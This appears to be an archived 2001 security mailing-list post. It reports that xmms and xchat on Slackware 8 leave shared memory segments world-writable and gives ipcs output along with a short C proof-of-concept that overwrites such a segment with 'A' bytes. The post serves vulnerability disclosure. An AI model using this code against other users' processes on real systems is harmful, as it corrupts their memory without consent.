|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: Julien VANEGUE (vanegu_j
epita.fr)Date: Sat Nov 03 2001 - 04:22:23 CST
On slackware 8 :
bash-2.05$ ipcs -m
------ Shared Memory Segments --------
key shmid owner perms bytes nattch status
0x00000000 4216960 mayhem 777 196608 2 dest
0x00000000 7636737 mayhem 777 196608 2 dest
bash-2.05$ ipcs -p -m
------ Shared Memory Creator/Last-op --------
shmid owner cpid lpid
4216960 mayhem 3921 1406
7636737 mayhem 26206 26209
bash-2.05$ cat /proc/3921/cmdline ; echo
/opt/gnome/bin/xmms
bash-2.05$ cat /proc/26206/cmdline ; echo
/opt/gnome/bin/xchat
bash-2.05$
Seems not to be exploitable (no fault) but still need to be fixed .
/*
** test_shm.c
**
** Made by Julien Vanegue
** Login <mayhemhert.org>
*/
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/shm.h>
#include <stdio.h>
#include <stdlib.h>
#define FATAL(str) { perror(str); exit(-1); }
void usage()
{
fprintf(stderr, "syntax: a.out semid size \n");
exit(-1);
}
int main(int argc, char **argv)
{
char *addr;
if (argc != 3)
usage();
if ((addr = shmat(atoi(argv[1]), 0, 0)) == (void *) -1)
FATAL("shmget");
memset(addr, 'A', atoi(argv[2]));
sleep(2);
}
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]